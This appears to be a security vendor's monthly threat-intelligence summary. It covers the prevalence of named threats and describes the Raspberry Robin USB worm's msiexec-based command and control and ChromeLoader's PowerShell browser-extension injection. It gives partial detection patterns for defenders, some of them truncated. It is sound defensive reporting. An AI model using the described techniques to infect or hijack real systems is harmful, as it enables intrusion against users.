⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Observations on trending threats
Overall threat volume increased slightly in May, with 13.3 percent of Red Canary customers encountering at least one named threat (up from 12.7% in April, but still below March’s 14.3% mark). Despite some typical shuffling, the prevalent threats this month were all within a few spots of last month’s top 10. Notably, after diving a little deeper into the differences between Gootkit and Gootloader, we’ve started to distinguish the more commonly observed Gootloader activity from the less common Gootkit payload. We previously tracked all of this activity under Gootkit, and the historical numbers for Gootloader referenced above reflect both Gootloader and Gootkit activity.
Blog posts published this month
In May, Red Canary published research on two threats: Raspberry Robin and ChromeLoader. In case you missed them, we’ve provided summaries here as well as links to the full articles.
Raspberry Robin is Red Canary’s name for a cluster of USB worm activity that we’ve been tracking since September 2021. If that name sounds familiar, it might be because we’ve shared information about Raspberry Robin with you in previous Intelligence Insights as it climbed the charts. In early May, we also published a blog on Raspberry Robin with our research on this threat.
Raspberry Robin appears to spread via infected USB drives. When the infected drive is plugged into a system, a shortcut (LNK file) masquerading as a legitimate folder is executed. In its first phase of activity, Raspberry Robin uses
msiexec.exe to reach out to a malicious IP address for command and control (C2) communication.
msiexec.exe downloading and executing packages
To detect suspicious use of
msiexec.exe by Raspberry Robin or other threats, it’s essential to take a look at the command line and the URL. Detecting
msiexec.exe making outbound network connections to download and install packages in the command line interface will give you the opportunity to examine the activity and determine if it’s malicious or not.
process == (
process_command_line_includes == (
process_command_line_includes == (
Over the past few weeks, we’ve heard from a number of security professionals who have spotted Raspberry Robin in their environments. We continue to monitor, track, and research Raspberry Robin activity and incorporate new information as necessary.
ChromeLoader is a pervasive and persistent browser hijacker that modifies its victims’ browser settings and redirects user traffic to advertisement websites. This malware is introduced via an ISO file that baits users into executing it by posing as a cracked video game or pirated movie or TV show. It eventually manifests as a browser extension.
Like most suspicious browser extensions, ChromeLoader is a relatively benign threat that hijacks user search queries and redirects traffic to an advertising site. However, ChromeLoader uses PowerShell to inject itself into the browser and add a malicious extension to it, a technique we don’t see very often (and one that often goes undetected by other security tools). If applied to a higher-impact threat—such as a credential harvester or spyware—this PowerShell behavior could help malware gain an initial foothold and go undetected before performing more overtly malicious activity, like exfiltrating data from a user’s browser session.
Detection opportunity: PowerShell spawning
AppData\Local within the command line
The detection analytic looks for instances of the Chrome browser executable spawning from PowerShell with a corresponding command line that includes
appdata\local as a parameter.
For more details and additional opportunities to detect this pushy malvertiser, check out our May blog post.